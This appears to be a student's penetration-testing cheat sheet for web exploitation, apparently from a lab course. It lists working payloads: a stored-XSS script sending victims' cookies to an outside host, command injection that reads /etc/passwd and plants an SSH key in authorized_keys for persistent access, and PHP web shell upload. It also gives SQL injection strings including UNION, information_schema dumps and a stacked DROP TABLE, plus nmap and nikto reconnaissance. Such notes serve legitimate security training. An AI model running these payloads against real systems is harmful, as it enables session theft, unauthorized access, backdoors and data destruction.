# Recursively mirror the FTP server, two levels deep (-l2), saving under /tmp (-P)
wget -r -l2 -P /tmp ftp://ftpserver/
# Log in with a POST body and keep the resulting session cookies in cookies.txt for later requests
# note: values passed via --post-data on the command line end up in shell history and process listings
wget --save-cookies cookies.txt --keep-session-cookies --post-data 'user=1&password=2' https://website
# Reuse the saved cookies to fetch the page together with its page requisites (-p: images, CSS, scripts)
wget --load-cookies cookies.txt -p https://website/interesting/article.php
- More Scripts
- JavaScript
allow websites to interact with the client
JavaScript runs on the client's machine
- ROBOTS.TXT
provides webcrawler a list of directories
nmap -v -sT -T5 --script http-enum.nse <target ips>
nmap -v -sT -T5 --script http-robots.txt.nse <target ips>
nmap -Pn -T5 -sT --script http-sql-injection.nse <IP>
*** nikto -h <target ip> ***
- Reflected
client side
Transient, occurs in error messages or search results
URLs can be Base64 encoded - Stored
Resides on the vulnerable site
Only requires the user to visit
# this will steal cookies from a message board
<script>document.location="http://10.50.20.97/Cookie_Stealer1.php?username=" + document.cookie;</script>
The ability to traverse through directories
Use relative paths ../../../
- the ability to run commands on a server
# The ';' semicolon allows you to inject commands
; cat /etc/passwd
# method to add a ssh public key to http server
ssh-keygen -t rsa # local side
cat ~/.ssh/id_rsa.pub # copy the full text
# command injection
; whoami # the user the webserver is login as
; cat /etc/passwd # to find the home directory
; ls -la <home dirctory> # check to see if the directory is created
; mkdir /home/dir # if the webserver user hasn't loged oun.
; echo "<public key> student@lin-op" >> /home/dir/.ssh/authorized_keys # add a new authorized_key
; cat /home/dir/.ssh/authorized_keys # check
when a server allows you to upload a file without validation.
you can upload a .php file that gives you a shell.
Then you can use the shell to do a command injection.
a standard database management language
SQL Commands
-- MySQL/MariaDB syntax: list the databases visible to the current account
SHOW databases;
-- List the tables of the `session` database without switching to it
SHOW TABLES FROM session;
-- Fully-qualified table reference (database.table)
SELECT * FROM session.car;
-- Switch the default database so later statements can use bare table names
USE session;
SHOW Tables;
-- Show the column definitions of `car`
DESCRIBE car;
SELECT * FROM car;
-- UNION requires both SELECT lists to have the same number of columns; the literals 1,2 pad the second list
SELECT * FROM car UNION SELECT tireid,name,size,cost,1,2 FROM Tires;
- SQL Injection
uses a valid query from the client side - Unsanitized Fields
the input field is vulnerable to basic SQL injection
Found using a single quote ' - Sanitized Fields
the input fields are checked to prevent harm to the database
# Truth Statement
USE session;
SELECT id FROM user WHERE name='tom' OR 1=1;
# This works because the OR clause 1=1 is always true, so the database returns every entry in the id field
# Stacking Statement
# Chaining multiple statements together using a semicolon
# some servers do not allow Stacking statements
SELECT * FROM user WHERE id=‘Johnny'; DROP TABLE Customers; --’
# Nesting statements
<INITIAL QUERY> UNION SELECT 1,2,name FROM user; -- This is the Nested Statement added to the below Query
SELECT carid, name, (SELECT SUM(cost) FROM Tires WHERE name = "goodyear") FROM car WHERE name = "ford" UNION SELECT 1,2,name
# comments abuse
# use a comment like # or -- within a query to ignore the server-side arguments that follow it
# Input to Inject:
1 or 1=1; #
#Server-Side Query becomes:
SELECT product FROM item WHERE id = 1 or 1=1; # limit 1;
# Blind SQL injection:
# Occurs when an attacker sends TRUE/FALSE statements to determine how the database is configured.
<URL>/uniondemo.php?Selection=2 Union SELECT 1,2 <!-- GET METHOD, enter in the URL -->
Audi' UNION SELECT 1,2,3,4 # <!-- POST METHOD, enter in the Input Field -->
Abuse The Client (GET METHOD)
Passing injection through the URL:
After the .php?item=4 pass your UNION statement
prices.php?item=4 UNION SELECT 1,2
prices.php?item=4 UNION SELECT 1,2,@@version
# @@version will return the host information for the SQL server.
### GET Method ###
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1; -- FUZZED PAGES
<URL>/placeholder.php?<DataBase>=<1.2.3.....> UNION SELECT table_schema,column_name,table_name FROM information_schema.columns -- Golden statems
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1;
### POST Method ###
tom' OR 1=1 #
press F12
copy raw sql from post
xfreerdp - Windows box with port 3389
net group
net users
whoami
net localgroup
### gui ###
regedit
run
runonce
services
schtasks